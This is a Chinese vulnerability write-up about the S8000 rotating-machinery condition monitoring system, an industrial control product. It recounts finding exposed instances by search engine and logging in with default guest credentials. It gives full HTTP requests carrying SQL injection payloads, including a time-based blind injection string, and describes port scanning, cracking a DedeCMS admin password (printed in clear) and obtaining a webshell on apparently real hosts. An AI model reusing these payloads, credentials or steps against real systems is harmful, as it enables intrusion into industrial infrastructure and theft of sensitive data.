工控安全之某大型旋转机SQL注入通杀全版本(内网拓扑/可调频段/大量敏感文件泄漏/成功Getshell一枚)

2022-3-31 3:37 作者：酷帥王子 | 工控物联网车联网安全 |

查看打雷案例: http://**.**.**.**/bugs/wooyun-2010-0135197
关键字: SCG8000 旋转机械在线状态监测
通过网络空间搜索: 旋转机械在线状态监测
成功搜索到 S8000 旋转机械在线状态监测与分析系统
成功搜索到案例一枚
**.**.**.**:8089/
上面还带着账号, 密码呢
guest_s guest_s 其实是可以注入的

 
	
		GET /default.asp?username=admin&userpassword=guest_s&lang=0&login=s8000& HTTP/1.1 Host: **.**.**.**:8089 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 DNT: 1 Referer: **.**.**.**:8089/ Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: ASPSESSIONIDSSBSSRRR=IEMPDKHAACJDABNIMADMLAPL; updateTips=true; language=zh; PHPSESSID=n49fsmb15gbuf4n8q3qko85i06; ASP.NET_SessionId=ymma2a2ogade0znpnm5wp3cw; ASPSESSIONIDCCADAQQS=CEPLJPHAMDMFDLGCLMNIDEGG; __utma=209175697.1832228353.1444478771.1444478771.1444478771.1; __utmc=209175697; __utmz=209175697.1444478771.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDSQASTRQQ=NJPJKPHAEIEIIDFLBGEDIFBE; DedeUserID=1; DedeUserID__ckMd5=513682e572e84453; DedeLoginTime=1444482489; DedeLoginTime__ckMd5=3338c8dffc8243d5; ASPSESSIONIDQSDSRQQR=CLLPDHNABPCNPOIBPBLDHMKI; s8k=Crt%5FDatabasePath%5F300=D%3A%5CMicrosoft+SQL+Server%5CMSSQL%5CData%5C&lang=0&DatabasePath%5Fs8k%5F300=C%3A%5CInetpub%5Cwwwroot%5Cpublic%5Cdatabase%5C&DatabaseType%5Fs8k%5F300=0

需要安装Java 2虚拟机J2RE1.4.2(或以上版本)才能正常浏览。
http://**.**.**.**/countries/china/our-locations/ 这是官网案例吧

阿尔斯通创为实还是2008年的世界500强呢~

可调频率!!!

是8089端口,应该还开了其他端口扫端口结果如下:
**.**.**.**:8081/dede/ 我一看到这个dede,感觉有戏, 一个通讯录有必要用dede么?

查看文章 http://**.**.**.**/content/2414
成功得到账号密码前减3位后减一位 **.**.**.**解密得到:
admin aza5572273
拿shell不解释了,我见过最简单的拿shell

里面全是站

由于开启了安全模式,不能执行命令,不知如何绕过,已经到了我技术的边沿了....
**.**.**.**:8082/
**.**.**.**:8086/
**.**.**.**:8087/
**.**.**.**:8088/custom/
**.**.**.**:81/
另外一枚:
**.**.**.**/ 这是没有guest_s的
发现SQL注入一枚

 
	
		POST /default.asp HTTP/1.1 Content-Length: 405 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: **.**.**.**/ Cookie: s8k=DatabaseType=0; ASPSESSIONIDSQSBDBDA=DCKJDKDAPEMMNJCNKEIBAECH Host: **.**.**.** Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* submit1=%b5%c7%c2%bc&IfRm=&IsFirst=0&JZGraphId=&menumark=1&Powers8000=0&s8000companyId=176&s8000companyName=%d4%a3%b6%ab%b5%e7%b3%a7&s8000FactoryType=0&s8000graph=S8000MachineGraph_Old&s8000keyid=&select=176_%d4%a3%b6%ab%b5%e7%b3%a7&stationid=&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&userpass=rivireqe